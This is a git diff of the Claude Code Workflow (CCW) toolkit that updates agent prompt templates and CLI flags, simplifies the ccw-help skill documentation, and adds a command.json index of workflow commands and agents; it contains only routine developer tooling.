RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/02-analyze-code-patterns.txt) | Focus on breaking changes, migration needs, and functional overlaps | Prioritize exploration-identified conflicts | analysis=READ-ONLY
|
||||
" --tool gemini --mode analysis --cd {project_root}
|
||||
CONSTRAINTS: Focus on breaking changes, migration needs, and functional overlaps | Prioritize exploration-identified conflicts | analysis=READ-ONLY
|
||||
" --tool gemini --mode analysis --rule analysis-code-patterns --cd {project_root}
|
||||
|
||||
Fallback: Qwen (same prompt) → Claude (manual analysis)
|
||||
|
||||
|
||||
@@ -237,7 +237,7 @@ Execute complete context-search-agent workflow for implementation planning:
|
||||
|
||||
### Phase 1: Initialization & Pre-Analysis
|
||||
1. **Project State Loading**:
|
||||
- Read and parse `.workflow/project-tech.json`. Use its `technology_analysis` section as the foundational `project_context`. This is your primary source for architecture, tech stack, and key components.
|
||||
- Read and parse `.workflow/project-tech.json`. Use its `overview` section as the foundational `project_context`. This is your primary source for architecture, tech stack, and key components.
|
||||
- Read and parse `.workflow/project-guidelines.json`. Load `conventions`, `constraints`, and `learnings` into a `project_guidelines` section.
|
||||
- If files don't exist, proceed with fresh analysis.
|
||||
2. **Detection**: Check for existing context-package (early exit if valid)
|
||||
@@ -255,7 +255,7 @@ Execute all discovery tracks:
|
||||
### Phase 3: Synthesis, Assessment & Packaging
|
||||
1. Apply relevance scoring and build dependency graph
|
||||
2. **Synthesize 4-source data**: Merge findings from all sources (archive > docs > code > web). **Prioritize the context from `project-tech.json`** for architecture and tech stack unless code analysis reveals it's outdated.
|
||||
3. **Populate `project_context`**: Directly use the `technology_analysis` from `project-tech.json` to fill the `project_context` section. Include description, technology_stack, architecture, and key_components.
|
||||
3. **Populate `project_context`**: Directly use the `overview` from `project-tech.json` to fill the `project_context` section. Include description, technology_stack, architecture, and key_components.
|
||||
4. **Populate `project_guidelines`**: Load conventions, constraints, and learnings from `project-guidelines.json` into a dedicated section.
|
||||
5. Integrate brainstorm artifacts (if .brainstorming/ exists, read content)
|
||||
6. Perform conflict detection with risk assessment
|
||||
|
||||
@@ -90,7 +90,7 @@ Template: ~/.claude/workflows/cli-templates/prompts/test/test-concept-analysis.t
|
||||
|
||||
## EXECUTION STEPS
|
||||
1. Execute Gemini analysis:
|
||||
ccw cli -p "$(cat ~/.claude/workflows/cli-templates/prompts/test/test-concept-analysis.txt)" --tool gemini --mode write --cd .workflow/active/{test_session_id}/.process
|
||||
ccw cli -p "..." --tool gemini --mode write --rule test-test-concept-analysis --cd .workflow/active/{test_session_id}/.process
|
||||
|
||||
2. Generate TEST_ANALYSIS_RESULTS.md:
|
||||
Synthesize gemini-test-analysis.md into standardized format for task generation
|
||||
|
||||
@@ -1,139 +1,86 @@
|
||||
---
|
||||
name: ccw-help
|
||||
description: Workflow command guide for Claude Code Workflow (78 commands). Search/browse commands, get next-step recommendations, view documentation, report issues. Triggers "CCW-help", "CCW-issue", "ccw-help", "ccw-issue", "ccw"
|
||||
description: CCW command help system. Search, browse, recommend commands. Triggers "ccw-help", "ccw-issue".
|
||||
allowed-tools: Read, Grep, Glob, AskUserQuestion
|
||||
version: 6.0.0
|
||||
version: 7.0.0
|
||||
---
|
||||
|
||||
# CCW-Help Skill
|
||||
|
||||
CCW command help system, providing command search, recommendations, documentation viewing, and issue reporting.
|
||||
CCW command help system, providing command search, recommendations, and documentation viewing.
|
||||
|
||||
## Trigger Conditions
|
||||
|
||||
- Keywords: "CCW-help", "CCW-issue", "ccw-help", "ccw-issue", "帮助", "命令", "怎么用"
|
||||
- 场景: 用户询问命令用法、搜索命令、请求下一步建议、报告问题
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```mermaid
|
||||
graph TD
|
||||
A[User Query] --> B{Intent Classification}
|
||||
B -->|搜索| C[Command Search]
|
||||
B -->|推荐| D[Smart Recommendations]
|
||||
B -->|文档| E[Documentation]
|
||||
B -->|新手| F[Onboarding]
|
||||
B -->|问题| G[Issue Reporting]
|
||||
B -->|分析| H[Deep Analysis]
|
||||
|
||||
C --> I[Query Index]
|
||||
D --> J[Query Relationships]
|
||||
E --> K[Read Source File]
|
||||
F --> L[Essential Commands]
|
||||
G --> M[Generate Template]
|
||||
H --> N[CLI Analysis]
|
||||
|
||||
I & J & K & L & M & N --> O[Synthesize Response]
|
||||
```
|
||||
- Keywords: "ccw-help", "ccw-issue", "帮助", "命令", "怎么用"
|
||||
- Scenarios: asking about command usage, searching for commands, requesting next-step suggestions
|
||||
|
||||
## Operation Modes
|
||||
|
||||
### Mode 1: Command Search 🔍
|
||||
### Mode 1: Command Search
|
||||
|
||||
**Triggers**: "搜索命令", "find command", "planning 相关", "search"
|
||||
**Triggers**: "搜索命令", "find command", "search"
|
||||
|
||||
**Process**:
|
||||
1. Query `index/all-commands.json` or `index/by-category.json`
|
||||
2. Filter and rank results based on user context
|
||||
3. Present top 3-5 relevant commands with usage hints
|
||||
1. Query `command.json` commands array
|
||||
2. Filter by name, description, category
|
||||
3. Present top 3-5 relevant commands
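A minimal search sketch against the `command.json` structure described under Data Source below (keyword and output shape are illustrative):

```bash
# Case-insensitive keyword match over name / description / category, top 5 hits
jq --arg q "plan" '[.commands[]
  | select((.name + " " + .description + " " + .category) | test($q; "i"))
  | {command, description}][:5]' command.json
```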
|
||||
|
||||
### Mode 2: Smart Recommendations 🤖
|
||||
### Mode 2: Smart Recommendations
|
||||
|
||||
**Triggers**: "下一步", "what's next", "after /workflow:plan", "推荐"
|
||||
**Triggers**: "下一步", "what's next", "推荐"
|
||||
|
||||
**Process**:
|
||||
1. Query `index/command-relationships.json`
|
||||
2. Evaluate context and prioritize recommendations
|
||||
3. Explain WHY each recommendation fits
|
||||
1. Query command's `flow.next_steps` in `command.json`
|
||||
2. Explain WHY each recommendation fits
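For example (field names taken from the `command.json` excerpt below):

```bash
# List recommended follow-ups for a given command
jq -r '.commands[] | select(.command == "/workflow:plan") | .flow.next_steps[]?' command.json
```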
|
||||
|
||||
### Mode 3: Full Documentation 📖
|
||||
### Mode 3: Documentation
|
||||
|
||||
**Triggers**: "参数说明", "怎么用", "how to use", "详情"
|
||||
**Triggers**: "怎么用", "how to use", "详情"
|
||||
|
||||
**Process**:
|
||||
1. Locate command in index
|
||||
2. Read source file via `source` path (e.g., `commands/workflow/lite-plan.md`)
|
||||
3. Extract relevant sections and provide context-specific examples
|
||||
1. Locate command in `command.json`
|
||||
2. Read source file via `source` path
|
||||
3. Provide context-specific examples
|
||||
|
||||
### Mode 4: Beginner Onboarding 🎓
|
||||
### Mode 4: Beginner Onboarding
|
||||
|
||||
**Triggers**: "新手", "getting started", "如何开始", "常用命令"
|
||||
**Triggers**: "新手", "getting started", "常用命令"
|
||||
|
||||
**Process**:
|
||||
1. Query `index/essential-commands.json`
|
||||
2. Assess project stage (0-to-1 greenfield vs. adding a new feature)
|
||||
3. Guide appropriate workflow entry point
|
||||
1. Query `essential_commands` array
|
||||
2. Guide appropriate workflow entry point
|
||||
|
||||
### Mode 5: Issue Reporting 📝
|
||||
### Mode 5: Issue Reporting
|
||||
|
||||
**Triggers**: "CCW-issue", "报告 bug", "功能建议", "问题咨询"
|
||||
**Triggers**: "ccw-issue", "报告 bug"
|
||||
|
||||
**Process**:
|
||||
1. Use AskUserQuestion to gather context
|
||||
2. Generate structured issue template
|
||||
3. Provide actionable next steps
|
||||
|
||||
### Mode 6: Deep Analysis 🔬
|
||||
## Data Source
|
||||
|
||||
**Triggers**: "详细说明", "命令原理", "agent 如何工作", "实现细节"
|
||||
Single source of truth: **[command.json](command.json)**
|
||||
|
||||
**Process**:
|
||||
1. Read source documentation directly
|
||||
2. For complex queries, use CLI for multi-file analysis:
|
||||
```bash
|
||||
ccw cli -p "PURPOSE: Analyze command documentation..." --tool gemini --mode analysis --cd ~/.claude
|
||||
```
|
||||
|
||||
## Index Files
|
||||
|
||||
CCW-Help uses a JSON index for fast lookups (no reference folder; source files are referenced directly):
|
||||
|
||||
| File | Content | Purpose |
|------|------|------|
| `index/all-commands.json` | Complete command catalog | Keyword search |
| `index/all-agents.json` | Complete agent catalog | Agent lookup |
| `index/by-category.json` | Grouped by category | Category browsing |
| `index/by-use-case.json` | Grouped by use case | Scenario recommendations |
| `index/essential-commands.json` | Core commands | Beginner onboarding |
| `index/command-relationships.json` | Command relationships | Next-step recommendations |
|
||||
| Field | Purpose |
|
||||
|-------|---------|
|
||||
| `commands[]` | Flat command list with metadata |
|
||||
| `commands[].flow` | Relationships (next_steps, prerequisites) |
|
||||
| `commands[].essential` | Essential flag for onboarding |
|
||||
| `agents[]` | Agent directory |
|
||||
| `essential_commands[]` | Core commands list |
|
||||
|
||||
### Source Path Format
|
||||
|
||||
The `source` field in the index is a relative path from the `index/` directory (go up the tree first, then resolve):
|
||||
The `source` field is a relative path (from the `skills/ccw-help/` directory):
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "workflow:lite-plan",
|
||||
"name": "lite-plan",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
}
|
||||
```
|
||||
|
||||
Path structure: `index/` → `ccw-help/` → `skills/` → `.claude/` → `commands/...`
|
||||
|
||||
## Configuration
|
||||
|
||||
| Parameter | Default | Description |
|------|--------|------|
| max_results | 5 | Maximum number of search results returned |
| show_source | true | Whether to show source file paths |
|
||||
|
||||
## CLI Integration
|
||||
|
||||
| Scenario | CLI Hint | Purpose |
|------|----------|------|
| Complex queries | `gemini --mode analysis` | Multi-file analysis and comparison |
| Documentation generation | - | Read source files directly |
|
||||
|
||||
## Slash Commands
|
||||
|
||||
```bash
|
||||
@@ -145,33 +92,25 @@ CCW-Help 使用 JSON 索引实现快速查询(无 reference 文件夹,直接
|
||||
|
||||
## Maintenance
|
||||
|
||||
### Updating the Index
|
||||
### Update Index
|
||||
|
||||
```bash
|
||||
cd D:/Claude_dms3/.claude/skills/ccw-help
|
||||
python scripts/analyze_commands.py
|
||||
```
|
||||
|
||||
What the script does:
1. Scan the `commands/` and `agents/` directories
2. Extract YAML frontmatter metadata
3. Generate relative path references (no reference copies)
4. Rebuild all index files
What the script does: scan the `commands/` and `agents/` directories and generate a unified command.json
|
||||
|
||||
## System Statistics
|
||||
## Statistics
|
||||
|
||||
- **Commands**: 78
|
||||
- **Agents**: 14
|
||||
- **Categories**: 5 (workflow, cli, memory, task, general)
|
||||
- **Essential**: 14 core commands
|
||||
- **Commands**: 88+
|
||||
- **Agents**: 16
|
||||
- **Essential**: 10 core commands
|
||||
|
||||
## Core Principle
|
||||
|
||||
**⚠️ Intelligent synthesis, not template copying**
**Intelligent synthesis, not template copying**

- ✅ Understand the user's specific situation
- ✅ Integrate information from multiple sources
- ✅ Tailor examples and explanations
- ✅ Provide progressive depth
- ❌ Copy documentation verbatim
- ❌ Return unprocessed JSON
- Understand the user's specific situation
- Integrate information from multiple sources
- Tailor examples and explanations
|
||||
|
||||
520
.claude/skills/ccw-help/command.json
Normal file
@@ -0,0 +1,520 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "2.0.0",
|
||||
"total_commands": 45,
|
||||
"total_agents": 16,
|
||||
"description": "Unified CCW-Help command index"
|
||||
},
|
||||
|
||||
"essential_commands": [
|
||||
"/workflow:lite-plan",
|
||||
"/workflow:lite-fix",
|
||||
"/workflow:plan",
|
||||
"/workflow:execute",
|
||||
"/workflow:session:start",
|
||||
"/workflow:review-session-cycle",
|
||||
"/memory:docs",
|
||||
"/workflow:brainstorm:artifacts",
|
||||
"/workflow:action-plan-verify",
|
||||
"/version"
|
||||
],
|
||||
|
||||
"commands": [
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning with in-memory plan, dispatches to lite-execute",
|
||||
"arguments": "[-e|--explore] \"task\"|file.md",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:lite-execute"],
|
||||
"alternatives": ["/workflow:plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-execute",
|
||||
"command": "/workflow:lite-execute",
|
||||
"description": "Execute based on in-memory plan or prompt",
|
||||
"arguments": "[--in-memory] \"task\"|file-path",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:lite-plan", "/workflow:lite-fix"]
|
||||
},
|
||||
"source": "../../../commands/workflow/lite-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix with optional hotfix mode",
|
||||
"arguments": "[--hotfix] \"bug description\"",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:lite-execute"],
|
||||
"alternatives": ["/workflow:lite-plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning with task JSON generation",
|
||||
"arguments": "\"description\"|file.md",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:action-plan-verify", "/workflow:execute"],
|
||||
"alternatives": ["/workflow:tdd-plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution with DAG parallel processing",
|
||||
"arguments": "[--resume-session=\"session-id\"]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:plan", "/workflow:tdd-plan"],
|
||||
"next_steps": ["/workflow:review"]
|
||||
},
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Cross-artifact consistency analysis",
|
||||
"arguments": "[--session session-id]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:plan"],
|
||||
"next_steps": ["/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "init",
|
||||
"command": "/workflow:init",
|
||||
"description": "Initialize project-level state",
|
||||
"arguments": "[--regenerate]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/init.md"
|
||||
},
|
||||
{
|
||||
"name": "clean",
|
||||
"command": "/workflow:clean",
|
||||
"description": "Intelligent code cleanup with stale artifact discovery",
|
||||
"arguments": "[--dry-run] [\"focus\"]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/clean.md"
|
||||
},
|
||||
{
|
||||
"name": "debug",
|
||||
"command": "/workflow:debug",
|
||||
"description": "Hypothesis-driven debugging with NDJSON logging",
|
||||
"arguments": "\"bug description\"",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/debug.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/workflow:replan",
|
||||
"description": "Interactive workflow replanning",
|
||||
"arguments": "[--session id] [task-id] \"requirements\"",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "session:start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Start or discover workflow sessions",
|
||||
"arguments": "[--type <workflow|review|tdd>] [--auto|--new]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:plan", "/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
},
|
||||
{
|
||||
"name": "session:list",
|
||||
"command": "/workflow:session:list",
|
||||
"description": "List all workflow sessions",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/workflow/session/list.md"
|
||||
},
|
||||
{
|
||||
"name": "session:resume",
|
||||
"command": "/workflow:session:resume",
|
||||
"description": "Resume paused workflow session",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/resume.md"
|
||||
},
|
||||
{
|
||||
"name": "session:complete",
|
||||
"command": "/workflow:session:complete",
|
||||
"description": "Mark session complete and archive",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/complete.md"
|
||||
},
|
||||
{
|
||||
"name": "brainstorm:auto-parallel",
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"description": "Parallel brainstorming with multi-role analysis",
|
||||
"arguments": "\"topic\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
|
||||
},
|
||||
{
|
||||
"name": "brainstorm:artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification with guidance specification",
|
||||
"arguments": "\"topic\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "brainstorm:synthesis",
|
||||
"command": "/workflow:brainstorm:synthesis",
|
||||
"description": "Refine role analyses through Q&A",
|
||||
"arguments": "[--session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/synthesis.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-plan",
|
||||
"command": "/workflow:tdd-plan",
|
||||
"description": "TDD planning with Red-Green-Refactor cycles",
|
||||
"arguments": "\"feature\"|file.md",
|
||||
"category": "workflow",
|
||||
"difficulty": "Advanced",
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:execute", "/workflow:tdd-verify"],
|
||||
"alternatives": ["/workflow:plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/tdd-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-verify",
|
||||
"command": "/workflow:tdd-verify",
|
||||
"description": "Verify TDD compliance with coverage analysis",
|
||||
"arguments": "[session-id]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Advanced",
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/workflow/tdd-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "review",
|
||||
"command": "/workflow:review",
|
||||
"description": "Post-implementation review (security/architecture/quality)",
|
||||
"arguments": "[--type=<type>] [session-id]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review.md"
|
||||
},
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Multi-dimensional code review across 7 dimensions",
|
||||
"arguments": "[session-id] [--dimensions=...]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:execute"],
|
||||
"next_steps": ["/workflow:review-fix"]
|
||||
},
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review-module-cycle",
|
||||
"command": "/workflow:review-module-cycle",
|
||||
"description": "Module-based multi-dimensional review",
|
||||
"arguments": "<path-pattern> [--dimensions=...]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-module-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review-fix",
|
||||
"command": "/workflow:review-fix",
|
||||
"description": "Automated fixing of review findings",
|
||||
"arguments": "<export-file|review-dir>",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:review-session-cycle", "/workflow:review-module-cycle"]
|
||||
},
|
||||
"source": "../../../commands/workflow/review-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "test-gen",
|
||||
"command": "/workflow:test-gen",
|
||||
"description": "Generate test session from implementation",
|
||||
"arguments": "source-session-id",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-gen",
|
||||
"command": "/workflow:test-fix-gen",
|
||||
"description": "Create test-fix session with strategy",
|
||||
"arguments": "session-id|\"description\"|file",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-fix-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-cycle-execute",
|
||||
"command": "/workflow:test-cycle-execute",
|
||||
"description": "Execute test-fix with iterative cycles",
|
||||
"arguments": "[--resume-session=id] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-cycle-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:new",
|
||||
"command": "/issue:new",
|
||||
"description": "Create issue from GitHub URL or text",
|
||||
"arguments": "<url|text> [--priority 1-5]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/new.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:discover",
|
||||
"command": "/issue:discover",
|
||||
"description": "Discover issues from multiple perspectives",
|
||||
"arguments": "<path> [--perspectives=...]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/discover.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:plan",
|
||||
"command": "/issue:plan",
|
||||
"description": "Batch plan issue resolution",
|
||||
"arguments": "--all-pending|<ids>",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"next_steps": ["/issue:queue"]
|
||||
},
|
||||
"source": "../../../commands/issue/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:queue",
|
||||
"command": "/issue:queue",
|
||||
"description": "Form execution queue from solutions",
|
||||
"arguments": "[--rebuild]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/issue:plan"],
|
||||
"next_steps": ["/issue:execute"]
|
||||
},
|
||||
"source": "../../../commands/issue/queue.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:execute",
|
||||
"command": "/issue:execute",
|
||||
"description": "Execute queue with DAG parallel",
|
||||
"arguments": "[--worktree]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/issue:queue"]
|
||||
},
|
||||
"source": "../../../commands/issue/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow",
|
||||
"arguments": "[path] [--tool <tool>]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "update-related",
|
||||
"command": "/memory:update-related",
|
||||
"description": "Update docs for git-changed modules",
|
||||
"arguments": "[--tool <tool>]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-related.md"
|
||||
},
|
||||
{
|
||||
"name": "update-full",
|
||||
"command": "/memory:update-full",
|
||||
"description": "Update all CLAUDE.md files",
|
||||
"arguments": "[--tool <tool>]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-full.md"
|
||||
},
|
||||
{
|
||||
"name": "skill-memory",
|
||||
"command": "/memory:skill-memory",
|
||||
"description": "Generate SKILL.md with loading index",
|
||||
"arguments": "[path] [--regenerate]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "load-skill-memory",
|
||||
"command": "/memory:load-skill-memory",
|
||||
"description": "Activate SKILL package for task",
|
||||
"arguments": "[skill_name] \"task intent\"",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "load",
|
||||
"command": "/memory:load",
|
||||
"description": "Load project context via CLI",
|
||||
"arguments": "[--tool <tool>] \"context\"",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load.md"
|
||||
},
|
||||
{
|
||||
"name": "compact",
|
||||
"command": "/memory:compact",
|
||||
"description": "Compact session memory for recovery",
|
||||
"arguments": "[description]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/compact.md"
|
||||
},
|
||||
{
|
||||
"name": "task:create",
|
||||
"command": "/task:create",
|
||||
"description": "Generate task JSON from description",
|
||||
"arguments": "\"task title\"",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/create.md"
|
||||
},
|
||||
{
|
||||
"name": "task:execute",
|
||||
"command": "/task:execute",
|
||||
"description": "Execute task JSON with agent",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "task:breakdown",
|
||||
"command": "/task:breakdown",
|
||||
"description": "Decompose task into subtasks",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/breakdown.md"
|
||||
},
|
||||
{
|
||||
"name": "task:replan",
|
||||
"command": "/task:replan",
|
||||
"description": "Update task with new requirements",
|
||||
"arguments": "task-id [\"text\"|file]",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display version and check updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"difficulty": "Beginner",
|
||||
"essential": true,
|
||||
"source": "../../../commands/version.md"
|
||||
},
|
||||
{
|
||||
"name": "enhance-prompt",
|
||||
"command": "/enhance-prompt",
|
||||
"description": "Transform prompts with session memory",
|
||||
"arguments": "user input",
|
||||
"category": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/enhance-prompt.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-init",
|
||||
"command": "/cli:cli-init",
|
||||
"description": "Initialize CLI tool configurations (.gemini/, .qwen/) with technology-aware ignore rules",
|
||||
"arguments": "[--tool gemini|qwen|all] [--preview] [--output path]",
|
||||
"category": "cli",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/cli/cli-init.md"
|
||||
}
|
||||
],
|
||||
|
||||
"agents": [
|
||||
{ "name": "action-planning-agent", "description": "Task planning and generation", "source": "../../../agents/action-planning-agent.md" },
|
||||
{ "name": "cli-execution-agent", "description": "CLI tool execution", "source": "../../../agents/cli-execution-agent.md" },
|
||||
{ "name": "cli-explore-agent", "description": "Codebase exploration", "source": "../../../agents/cli-explore-agent.md" },
|
||||
{ "name": "cli-lite-planning-agent", "description": "Lightweight planning", "source": "../../../agents/cli-lite-planning-agent.md" },
|
||||
{ "name": "cli-planning-agent", "description": "CLI-based planning", "source": "../../../agents/cli-planning-agent.md" },
|
||||
{ "name": "code-developer", "description": "Code implementation", "source": "../../../agents/code-developer.md" },
|
||||
{ "name": "conceptual-planning-agent", "description": "Conceptual analysis", "source": "../../../agents/conceptual-planning-agent.md" },
|
||||
{ "name": "context-search-agent", "description": "Context discovery", "source": "../../../agents/context-search-agent.md" },
|
||||
{ "name": "doc-generator", "description": "Documentation generation", "source": "../../../agents/doc-generator.md" },
|
||||
{ "name": "issue-plan-agent", "description": "Issue planning", "source": "../../../agents/issue-plan-agent.md" },
|
||||
{ "name": "issue-queue-agent", "description": "Issue queue formation", "source": "../../../agents/issue-queue-agent.md" },
|
||||
{ "name": "memory-bridge", "description": "Documentation coordination", "source": "../../../agents/memory-bridge.md" },
|
||||
{ "name": "test-context-search-agent", "description": "Test context collection", "source": "../../../agents/test-context-search-agent.md" },
|
||||
{ "name": "test-fix-agent", "description": "Test execution and fixing", "source": "../../../agents/test-fix-agent.md" },
|
||||
{ "name": "ui-design-agent", "description": "UI design and prototyping", "source": "../../../agents/ui-design-agent.md" },
|
||||
{ "name": "universal-executor", "description": "Universal task execution", "source": "../../../agents/universal-executor.md" }
|
||||
],
|
||||
|
||||
"categories": ["workflow", "issue", "memory", "task", "general", "cli"]
|
||||
}
|
||||
@@ -1,82 +0,0 @@
|
||||
[
|
||||
{
|
||||
"name": "action-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/action-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-execution-agent",
|
||||
"description": "|",
|
||||
